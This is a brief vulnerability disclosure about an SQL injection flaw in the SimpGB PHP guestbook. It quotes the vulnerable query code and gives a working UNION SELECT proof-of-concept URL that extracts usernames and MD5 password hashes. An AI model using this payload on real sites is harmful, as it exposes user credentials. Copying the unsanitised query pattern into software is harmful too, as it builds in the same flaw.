Hi, The PHP guestbook SimpGB [1], written by Boesch IT-Consulting [2] can be exploited to gain userdata. The quote variable isn't checked carefully in simpgb/include/gb_new.inc called by guestbook.php. I wrote a proof of concept which shows a md5 hash and the username, read from the database. simpgb/include/gb_new.inc: 50: if(isset($quote) && ($quote)) 51: { 52: $sql = "select * from ".$tableprefix."_data where entrynr=$quote"; 53: if(!$result = mysql_query($sql, $db)) 54: die("Unable to connect to database.".mysql_error()); PoC: http://[whereever the guestbook is]/simpgb/guestbook.php?lang=de&mode=new "e=-1%20UNION%20SELECT%200,0,username,0,password,0,0,0,0,0,0 ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20simpgb_users%20WHERE%201 The developer has been informed. [1] http://www.boesch-it.de/sw/php-scripts/simpgb/english/download.php [2] http://www.boesch-it.de Greets to neonomicus who helped me getting the database structure of SimpGB. visus